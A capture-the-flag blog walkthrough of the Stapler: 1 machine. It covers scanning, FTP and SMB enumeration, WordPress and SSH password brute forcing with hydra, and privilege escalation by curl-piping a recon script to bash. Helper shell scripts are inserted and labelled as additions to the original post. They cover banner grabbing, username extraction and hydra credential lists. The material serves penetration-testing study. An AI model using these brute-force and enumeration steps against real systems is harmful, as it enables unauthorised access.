Sat. Oct 24th, 2020

Pentesting Fun Stuff

following the cyber security path…

Stapler: 1

This is another challenge from my OSCP list. It is a challenge from 2016 and this is from its description:

Let’s start…..

Recon

What ports are open and what services are running?

That’s a long list of ports and services. At first glance there is an FTP server with anonymous login enabled.
There are also 2 webservers, a samba server and a MySQL server running.
Finally there is also something returning output on port 666.

If you can’t remember which service is normally assigned to a port, you can look it up in /etc/services on Linux.
As an example, I’m going to check out port 3306.

FTP

Anonymous login is enabled, so let’s see what is inside.

Collected a possible username: harry
But what banner?

No password yet, so moving on.

Two more possible usernames: elly and john.
I put the usernames into a list for later use.

Port 666

When connecting to port 666 it returns unreadable output, which I redirect into a file.

A zip file.

Another possible username. The message about a segmentation fault could suggest a buffer overflow.

It looks like there is some useful metadata inside this picture. Getting a cookie? Ok.
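The port 666 step above, as an added example that is not part of the original post: grab whatever the port sends into a file and work out what it is from the first bytes, without relying on the `file` utility. The host, port and output filename are placeholders, and the sample bytes used to check it are constructed.

```shell
#!/bin/sh
# Grab the raw response of a non-standard port and identify it by magic bytes.
# Added example, not from the original post. Host/port/filename are placeholders.

# Save whatever HOST:PORT sends to OUTFILE. Nothing is sent; nc gives up after
# 5 seconds of inactivity so a service that never closes the connection does
# not hang the shell.
grab_port() {          # grab_port HOST PORT OUTFILE
  nc -w 5 "$1" "$2" > "$3" < /dev/null
}

# Print a type name derived from the first four bytes of FILE.
# The magic values below are the standard ones for each format.
identify_blob() {      # identify_blob FILE
  magic=$(od -An -tx1 -N4 "$1" | tr -d ' \n')
  case "$magic" in
    504b0304) echo zip ;;        # zip local file header "PK\3\4"
    1f8b*)    echo gzip ;;
    89504e47) echo png ;;
    ffd8ff*)  echo jpeg ;;
    7f454c46) echo elf ;;
    *)        echo unknown ;;
  esac
}

# Typical use against a target (IP is a placeholder):
#   grab_port 192.168.56.101 666 port666.bin
#   identify_blob port666.bin        # prints: zip
#   unzip -l port666.bin && unzip port666.bin
#   exiftool <unpacked image>        # look at the metadata of what was inside
```

`file port666.bin` gives the same answer on any box that has it; the magic-byte check is there for minimal environments and to make the classification explicit.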

Webservers

I thought I would get a cookie when browsing the website at port 12380, but no cookie.
There are some comments in the source page.

More usernames for the file.
My directory brute force attempts came up empty, so maybe Nikto will have better luck.

These scans look promising. In the first one there is a file found that resides in the home folder of a user, so there may be LFI possibilities.
The second scan shows the existence of a robots.txt file, which has 2 entries. Also, there is a phpMyAdmin page and there is an SSL certificate with some useful information.

It seems I checked out HTTP, but forgot HTTPS. When browsing to /admin112233/ I get a pop-up.

The blogblog entry takes me to a WordPress site and I navigate to the wp-admin page.

So there is a john user, but the password is just not correct. Time for wpscan.
When using wpscan here, the --disable-tls-checks option is essential.
Without it the scan aborts because of the certificate.

The scan says the WordPress install runs version 4.2.1, and this version has some vulnerabilities.
I also got some valid usernames, so that was what I wanted to investigate first, as it’s relatively easy.

For brute forcing the passwords I used a password list from SecLists.
I tried Harry first, but this user has no useful rights. So I try Tim next.

Tim has the same rights, and so does Kathy. They can’t do anything without it first being approved by the admin, and it looks like that is John.

There are several ways to get a reverse shell from WordPress, but in this case it wasn’t that simple. What I tried:

  • altering the 404 page by replacing its PHP code with the reverse shell code from pentestmonkey. This didn’t work because the files weren’t writable.

  • installing a plugin. This also did not work, because WordPress asked me for FTP credentials.

After some time I decided to move on to another service, because there was much more to go on. Maybe I would find something useful along the way.

SMB

Because connecting to the MySQL server needs a password, I go for the SMB server.

Another option that Kali has to enumerate an SMB server is a Perl script named enum4linux. This script has many options, but for now I’m going to enumerate users via RID cycling.

Now to filter out the usernames and store them in the usernames.txt file.

After checking the list, it seems that I have duplicates.
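The filter-and-deduplicate step above, as an added example that is not part of the original post. The RID-cycling lines are constructed to look like enum4linux output (Samba reports local accounts as `S-1-22-1-<uid> Unix User\<name> (Local User)`), and the file names and target IP are placeholders. Case is deliberately kept: Linux account names are case-sensitive, so lowercasing the list would produce logins that do not exist.

```shell
#!/bin/sh
# Extract account names from enum4linux RID-cycling output and merge them into
# the running username list without duplicates. Added example, not from the
# original post. The sample below is constructed, not captured from the target.

SAMPLE_RID_OUTPUT='S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\JKanode (Local User)
S-1-22-1-1002 Unix User\elly (Local User)
S-1-22-1-1000 Unix User\peter (Local User)
S-1-5-21-1234567890-987654321-1122334455-513 STAPLER\None (Domain Group)'

# Read RID-cycling output on stdin, print each local account once.
# Only "(Local User)" lines count; groups and aliases are dropped.
# LC_ALL=C keeps sort byte-ordered and case-sensitive on every system.
extract_users() {
  LC_ALL=C sed -n 's/.*\\\([^ ]*\) (Local User).*/\1/p' | LC_ALL=C sort -u
}

# Merge NEW_LIST into EXISTING_LIST in place, one unique name per line.
merge_users() {        # merge_users EXISTING_LIST NEW_LIST
  tmp=$(mktemp)
  LC_ALL=C sort -u "$1" "$2" > "$tmp" && mv "$tmp" "$1"
}

# Typical use (IP is a placeholder):
#   enum4linux -r 192.168.56.101 | extract_users > rid_users.txt
#   merge_users usernames.txt rid_users.txt
#   wc -l usernames.txt
```

Running `extract_users` on the constructed sample yields `JKanode`, `elly` and `peter`: the repeated `peter` line collapses to one entry and the group line is ignored.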

From the scans it looks like the tmp share is writable, but let’s try the Kathy share first.

From this share I get 3 files.

Now for the tmp share.

A text file with a listing of a filesystem. I can’t really do anything with it from here.

UDP

Because FTP is used in this challenge, I decided to check another angle: UDP.

Nmap can’t tell for sure (UDP ports often come back as open|filtered), so we can try it anyway.

Cool. Let’s see if we can upload a file.

Unfortunately the script wasn’t anywhere to be found.

SSH

I really don’t like brute forcing, mostly because it can take a very long time and it is very noisy.
But in this case I give it a shot.

And this is why I don’t like brute forcing. Before I found these credentials I tried several lists from SecLists first and then the rockyou list.
When that didn’t work I almost gave up on this option, and only as a last attempt did I use the info I found during this pentest, which was more luck than wisdom.
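The last attempt above, using information gathered during the pentest instead of a generic wordlist, as an added example that is not part of the original post. The assumption (mine, not the author’s) is that the first thing worth trying per account is a password derived from the username itself; each name in usernames.txt becomes a handful of user:pass candidates that hydra can take with its -C option. Target IP and file names are placeholders.

```shell
#!/bin/sh
# Turn the username list gathered during recon into targeted user:pass
# candidates for hydra -C. Added example, not from the original post.
# Assumption: weak per-user passwords derived from the username are worth
# trying before a large generic list.

# Read usernames on stdin, print one "user:pass" candidate per line.
# The username keeps its case (Linux logins are case-sensitive); the password
# guesses are the name as-is, lowercased, reversed, and with common suffixes.
gen_pairs() {
  while IFS= read -r u; do
    [ -z "$u" ] && continue
    lower=$(printf '%s' "$u" | tr 'A-Z' 'a-z')
    reversed=$(printf '%s' "$u" | awk '{ s = ""; for (i = length($0); i > 0; i--) s = s substr($0, i, 1); print s }')
    for p in "$u" "$lower" "$reversed" "${u}123" "${lower}1"; do
      printf '%s:%s\n' "$u" "$p"
    done
  done | awk '!seen[$0]++'      # drop duplicates (e.g. when the name is already lowercase)
}

# Typical use (IP is a placeholder):
#   gen_pairs < usernames.txt > pairs.txt
#   hydra -C pairs.txt -t 4 ssh://192.168.56.101
# Strings picked up elsewhere (banners, comments, metadata) go in a second run:
#   hydra -L usernames.txt -P found_strings.txt -t 4 ssh://192.168.56.101
```

Keeping -t low matters against sshd, which rate-limits and logs failed attempts; a short targeted list like this finishes in seconds where rockyou takes hours.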

EoP

Let’s start with some basic enumeration.
I start a Python HTTP server on port 80 from the folder containing a recon bash script.

Then I curl it on the remote system and pipe it to bash.
This way the script runs on the remote system without the file having to be transferred first.

It looks like Peter is the user of interest, and from JKanode’s shell history it looks like I have his password.

Well….that’s nice.

And that’s the flag.

Conclusion

This was definitely good practice in working your way through a system step by step.
Given the many possibilities this challenge offered to get access, I found it odd that there were so many rabbit holes that turned out to be nothing and that in the end a simple SSH brute force did the trick.

To compare notes I read a few walkthroughs from others who did the same challenge, and some had different outcomes, with WordPress for example.
For them uploading the plugin was no problem and there was no mention of FTP credentials.

Anyhow….I really liked this challenge and I would recommend it to anyone who is trying to learn more about pentesting.
